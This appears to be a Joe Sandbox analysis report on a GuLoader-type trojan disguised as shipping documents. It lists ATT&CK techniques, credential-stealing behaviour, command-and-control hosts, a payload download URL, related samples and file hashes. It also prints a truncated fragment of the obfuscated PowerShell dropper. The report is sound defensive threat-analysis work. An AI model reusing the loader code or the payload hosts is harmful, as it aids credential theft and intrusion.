            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 3876, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Native API
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory24
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell
            Logon Script (Windows)111
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
            Virtualization/Sandbox Evasion
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520706 Sample: Shipping documents 00030949... Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 27 ftp.concaribe.com 2->27 29 concaribe.com 2->29 31 api.ipify.org 2->31 45 Found malware configuration 2->45 47 Antivirus detection for dropped file 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 6 other signatures 2->51 8 Shipping documents 000309498585956000797900.exe 1 23 2->8         started        signatures3 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 20 8->11         started        process6 file7 23 Shipping documents...585956000797900.exe, PE32 11->23 dropped 25 Shipping documents...exe:Zone.Identifier, ASCII 11->25 dropped 53 Writes to foreign memory regions 11->53 55 Found suspicious powershell code related to unpacking or dynamic code loading 11->55 57 Powershell drops PE file 11->57 15 msiexec.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 concaribe.com 192.185.13.234, 21, 49716 UNIFIEDLAYER-AS-1US United States 15->33 35 84.38.133.140, 49714, 80 DATACLUB-NL Latvia 15->35 37 api.ipify.org 104.26.13.205, 443, 49715 CLOUDFLARENETUS United States 15->37 39 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 signatures11

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Shipping documents 000309498585956000797900.exe21%ReversingLabsWin32.Trojan.Guloader
            Shipping documents 000309498585956000797900.exe100%AviraHEUR/AGEN.1357304
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe100%AviraHEUR/AGEN.1357304
            C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe21%ReversingLabsWin32.Trojan.Guloader
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://api.ipify.org/0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            https://api.ipify.org0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            api.ipify.org
            104.26.13.205
            truefalse
              unknown
              concaribe.com
              192.185.13.234
              truetrue
                unknown
                ftp.concaribe.com
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.ipify.org/false
                  • URL Reputation: safe
                  unknown
                  http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.binfalse
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://api.ipify.orgmsiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://contoso.com/powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ftp.concaribe.commsiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        http://concaribe.commsiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          http://nsis.sf.net/NSIS_Error...Shipping documents 000309498585956000797900.exe, 00000000.00000000.2041425401.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpfalse
                            unknown
                            https://api.ipify.org/tmsiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin~msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.m$powershell.exe, 00000001.00000002.2912266214.0000000006ED1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    84.38.133.140
                                    unknownLatvia
                                    203557DATACLUB-NLfalse
                                    104.26.13.205
                                    api.ipify.orgUnited States
                                    13335CLOUDFLARENETUSfalse
                                    192.185.13.234
                                    concaribe.comUnited States
                                    46606UNIFIEDLAYER-AS-1UStrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1520706
                                    Start date and time:2024-09-27 18:32:07 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 5s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:7
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Shipping documents 000309498585956000797900.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@6/15@2/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 150
                                    • Number of non-executed functions: 57
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6396 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Shipping documents 000309498585956000797900.exe
                                    TimeTypeDescription
                                    12:32:58API Interceptor34x Sleep call for process: powershell.exe modified
                                    12:34:26API Interceptor320x Sleep call for process: msiexec.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    104.26.13.205file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                    • api.ipify.org/
                                    SecuriteInfo.com.Win64.Evo-gen.13899.14592.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • api.ipify.org/
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    api.ipify.orgHyZh4pn0RF.exeGet hashmaliciousCreal StealerBrowse
                                    • 172.67.74.152
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 172.67.74.152
                                    SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exeGet hashmaliciousAgentTeslaBrowse
                                    • 172.67.74.152
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.12.205
                                    rQuotation3200025006.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.12.205
                                    mSLEwIfTGL.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 172.67.74.152
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    DATACLUB-NLfile.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                    • 185.29.11.53
                                    Shipping documents 000022999878999800009999.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 185.29.11.53
                                    Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 185.29.11.53
                                    Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 185.29.11.53
                                    PO 00009876660887666000.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 84.38.133.121
                                    Bankcopyscanneddoc.exeGet hashmaliciousRedLineBrowse
                                    • 84.38.129.21
                                    xCjIO3SCur0S.exeGet hashmaliciousRemcosBrowse
                                    • 185.29.11.23
                                    new.cmdGet hashmaliciousGuLoaderBrowse
                                    • 185.29.11.28
                                    temp.cmdGet hashmaliciousUnknownBrowse
                                    • 185.29.11.28
                                    price_request_.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                    • 185.29.11.62
                                    CLOUDFLARENETUSHyZh4pn0RF.exeGet hashmaliciousCreal StealerBrowse
                                    • 172.67.74.152
                                    http://www.jp-area.com/beppu/rank.cgi?mode=link&id=218&url=https://0oenqK.startprogrammingnowbook.comGet hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 104.21.56.213
                                    https://www.pineapplehospitality.net/Get hashmaliciousUnknownBrowse
                                    • 188.114.96.3
                                    file.exeGet hashmaliciousBlank GrabberBrowse
                                    • 162.159.133.233
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    https://mercado.defontana.com/loginExterno/IaQsEFxmZUCwWgcKW2iAgGet hashmaliciousUnknownBrowse
                                    • 1.1.1.1
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 104.26.12.205
                                    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 172.67.74.152
                                    UNIFIEDLAYER-AS-1USDHL-AWB#TRACKING907853880911.batGet hashmaliciousAgentTeslaBrowse
                                    • 173.254.28.210
                                    EreglishipyardFiyat Teklif Talebi.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                    • 108.167.140.123
                                    https://nio.byd.mybluehost.me/wp-admin/includes/ss/sb/Get hashmaliciousUnknownBrowse
                                    • 50.6.153.174
                                    shipping documents.exeGet hashmaliciousAgentTeslaBrowse
                                    • 162.214.80.31
                                    http://novo.oratoriomariano.com/novo/Get hashmaliciousUnknownBrowse
                                    • 162.241.61.68
                                    http://direcprimviva.com/acessar.phpGet hashmaliciousUnknownBrowse
                                    • 192.185.222.148
                                    https://novo.oratoriomariano.com/novo/99417/Entry.htmlGet hashmaliciousUnknownBrowse
                                    • 162.241.61.68
                                    https://novo.oratoriomariano.com/novo/11614/Get hashmaliciousUnknownBrowse
                                    • 162.241.61.68
                                    https://globaltechnicalsystems.lk/portal/post/dhlAr/Get hashmaliciousUnknownBrowse
                                    • 162.214.157.176
                                    http://alibinaadi.com/.well-known/alibaba/Alibaba/index.phpGet hashmaliciousUnknownBrowse
                                    • 173.254.68.150
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    3b5074b1b5d032e5620f69f9f700ff0ehttps://www.pineapplehospitality.net/Get hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousAmadey, BitCoin Miner, SilentXMRMinerBrowse
                                    • 104.26.13.205
                                    SecuriteInfo.com.Trojan.PackedNET.3065.20099.26130.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    https://effective-teammates-567500.framer.app/Get hashmaliciousHTMLPhisherBrowse
                                    • 104.26.13.205
                                    https://main.d3engbxc9elyir.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    file.exeGet hashmaliciousLummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, StealcBrowse
                                    • 104.26.13.205
                                    Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    PURCHASE ORDER ADDISON-6378397379UUE.exeGet hashmaliciousAgentTeslaBrowse
                                    • 104.26.13.205
                                    http://polskie-torrenty.eu/redir.php?url=https://globalfinanceweb.com%2FProfile%2Fluig%2Fnzx0k%2FmProtect.html%23abrumley@highlandfunds.comGet hashmaliciousUnknownBrowse
                                    • 104.26.13.205
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):7680
                                    Entropy (8bit):5.195875603619049
                                    Encrypted:false
                                    SSDEEP:96:re5Vl/7KOuFlKHMpXGu8FX6eT3sQk1u2QmIGvebAQvL7hDAbUlV:65Vl+hSs2u85TTHkZQmubLL7hDMo
                                    MD5:5D63878DA0CDA0B331E80E43E3D3C2FA
                                    SHA1:749B02A5BCEB2D1F8A912DFAF40FE8C3B082BF58
                                    SHA-256:21EB98AA735FC4B4072E670A78F1E5802B3D3C950BEF72E32F573DD514AC7F18
                                    SHA-512:240CCBD96BBF5D4608778B91AB14B73B20771FFF3763E8DF04A9DF83F5371D4ADA64B5B6CC262626927EE1C13FC0D98BFAAA0332786C0AF588A4C24924575ED1
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C\.."2U."2U."2UjP3T."2U."3U."2U{W6T."2U{W2T."2U{W0T."2URich."2U................PE..L...Y+.c.........."!......................... ...............................P............@..........................!..l...."..P............................@....................................................... ...............................text...#........................... ..`.rdata..&.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):369480
                                    Entropy (8bit):1.2481431502483955
                                    Encrypted:false
                                    SSDEEP:768:rRtHMGSSGym0GvY1hW6IWahE7Wv7zT0usCP6u7iaqflywWTGLMk/4LnwvB4nUq6F:rzMsGyD1CQ6Qqwa9DMXDEUMN2H9mSRd
                                    MD5:7A51F952314931F78E15E10CCDFDD4A6
                                    SHA1:EC01397588C61F15D589BA0D6C684D2514171376
                                    SHA-256:6CBFFDA90A33E4B379B2A0FC277C560BA4DC005EE5BEABE37472F702248B5C78
                                    SHA-512:E0AB5897562EE6B1EBF271FA19CDEDAEBCF93DBB006130A959E51D0B3BEBBF91C112D11FEB7AA8EE4704973730F60C3C46453364720FF8DF00FBE52366883CBA
                                    Malicious:false
                                    Preview:..........v........................................................................0........l....................................................x.C......-........................................K............W...........*(.............................|.................z........................{...............................................4......'............$..................... .............#................5.....-.................O.................................J...."..................Y...~............n..............r....................=..................U.........-......................................................................................................^.............................................................................#...........9......................................................................................................................................................................|...........................................................
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):74392
                                    Entropy (8bit):5.199413846614902
                                    Encrypted:false
                                    SSDEEP:1536:fZf2tn3YvW1qxnCFkB6bLxwBEwYIoZx0DKntzW5kdF34+mXIzwPi7nvrALj29pe:BCETIFkU5wy0DYWjxhPi7TA8pe
                                    MD5:E2DF89F3AFDD3B0CA4CBEF2B70903B01
                                    SHA1:2291A0ED4A9A2C5DF3138F42BBE3D72A441461A8
                                    SHA-256:EB337ED184F884C1DEC3C08C74FDAF9E513CA7086BD7CCCEAF3511829CA54E81
                                    SHA-512:0C18FE4CA7AC53E3D0B63D43064D8E3E25A055325042B4F1038BECE4A7B7717FEBF08A0F97D10D3234A5E4A5CAEF239387C66690C3BE522E68F4888702055BD6
                                    Malicious:false
                                    Preview:$Ringsider=$Phytoptosis;<#Livstestamenters Schemery Hierakiet #><#Unlabialises Gymnostomous Chylocaulous Replotting Serailet Tormentillenes #><#Thamnophilus Kragerede Talaria Vesiculotympanic #><#bandereklamer Heldets Satsudkrselen Babels #><#Bjlkevrk Cymagraph Arbejdslnninger Amala Bagind Attributionerne #><#Kombipakken Redactors Benzoate Familieplanlgnings Stramajbroderiets #>$Hovedspring = " edelin; Laundr`$UnpalpaSgalakseh hetlanaOppos trMusterip Un itu=U debas`$ OrdfjnFLivsrumiIcoddetrEnsilage Lyri itMicklesoCandi awsyntagmeapterygr Ecbser;OejeblifArbe deuArthrosnDatauhecDip thotSwayingi LandzooStopursnBrynjek LgthdepR Buq,hae SkippedAnkiesgi.ktiverr ,ompluesodomitcFlisebetBrdstru Lej,re(magtfak`$LaceyspTKonditor Fant ssunuseabtIntisyneScrotaurVilmasei,uborecgMessias,Faldsta`$AltheinTZinnniaiHipparcl Tamb rlMonitorr.onnasoiSiderognForbestgSaltcateMutateprCinn,manPl onaseRodls fsLnkerad) vecti Forbear{St.ejke.Gennems`$arethusU Marketn ,irvardFnblgnieMaturerrGallstonAdequatoTermit
                                    Process:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):322023
                                    Entropy (8bit):7.690636487928766
                                    Encrypted:false
                                    SSDEEP:6144:H2E0Z0LauJLlzhLGMBLeRWLNkvKcL4L2sq+P9NKEUNa+K0Hc:hzZ/BSkJ4KUCqg9Nfaa+K7
                                    MD5:6E673E7179AAABB9AB1520DF399DCA08
                                    SHA1:6AF2A4F10568E5B549DB34AE133E8B948DA8BC81
                                    SHA-256:D85D0441841CB77E0C3A008687E41D7EDA78E35CB2DC692DD9006A719524025C
                                    SHA-512:7418D82D3F65158A85AF3EB5090DC4B65E82E96B9BBD221AACBF296D02F82BCFA833640C5E3FCEA5123D762A902097A4834EE4126FD0B4F6CE43C8D40812B67D
                                    Malicious:false
                                    Preview:...........pp.......!..................b.g.pp.......yyy..ww.........c..PP....?.h............-----.......66..........GGG.PP.........*..............6....\.........................Z........l............R.............$..~......s....6......*.YYYYYYYY.......}}....\\..........--..............................??............wwwww.......,......m.....................zz.....MM..6...............WW....0...............@..{.eeeee.11.@@.zz...II..TT......YY.......O..bb......................................\\.................QQ.......9.*...................................=.JJJ..............).4.............UUUU...............;.............................`````........77.................................Y...tttttt..............\.VV............YYYYYY.........5......................Q.............T...............tt....88888..................NN.MM...%%%.........................................................,....u..kk..........................****............==.......rr..........................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):1081112
                                    Entropy (8bit):6.186153453421366
                                    Encrypted:false
                                    SSDEEP:12288:5faWYFsj2FYoIAyPn4/SLfP2Udh1rtZJi3l/zSL6WKuwpbt+jBL/nepC:ldeXi4/42Up5KV/zSOWlabAjNnKC
                                    MD5:94C700B33FB2A1AA2BD02F13750CCA75
                                    SHA1:ABE3ABD4F60778DFA694A8FC54B9D1037A248132
                                    SHA-256:9F40759902174555AB1294EB92AE2D17AD2698D2E0E68694EDBB9684BDAB7692
                                    SHA-512:B1962793A313490385CE265763A05585ABF1793336FFBBB853FC64B6807E35EC98B28DAEBE147F98BB901A804CE88BC930C33B7938F31B51B9C9A0C258DECC5A
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 21%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................r...........6............@.......................................@..........................................@...............u...............................................................................................text...2p.......r.................. ..`.rdata...............v..............@..@.data...............................@....ndata.......`...........................rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
